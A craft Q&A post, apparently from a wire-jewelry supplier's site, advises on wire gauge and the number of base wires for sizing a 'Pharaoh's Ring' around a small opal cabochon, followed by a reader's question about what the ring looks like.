Question:

I want to make a Pharaoh’s Ring using a 10mm x 8mm opal cabochon that I purchased from Wire-Sculpture, but I’m not sure of the sizing from the middle of the wire to the wrapped sides. I also have your DVD on the Pharaoh’s Ring, but can’t find the information I need for sizing.

Answer:

Each of our Dale “Cougar” Armstrong DVDs that features a ring design also includes a handy sizing card or the sizing formulas on the written directions that come with the DVD. I also show the sizing card on the videos, and explain how to size properly. Check in your DVD case for this sizing information–if you didn’t receive a booklet with your DVD, let the Wire-Sculpture support team know at 1-877-636-0608 or through Live Chat, and they’ll take care of you.

Back to your Pharaoh’s Ring, my advice for the smaller opal cab you would like to make into a ring, would be to use a 22-gauge square half hard wire. Depending on the desired finished size, I’d use 8 or 10 base wires.

If the ring is to be a larger size, be prepared to add several fill-in wires around the stone (also demonstrated and discussed on my DVDs).

If the finished ring is to be a very small, delicate size, such as a 5 or smaller, you could try using a 24-gauge square half hard wire.

Good luck with your project!

what is a pharaoh ring and what does it look like? I have one of Dale’s books and can find no reference to it.
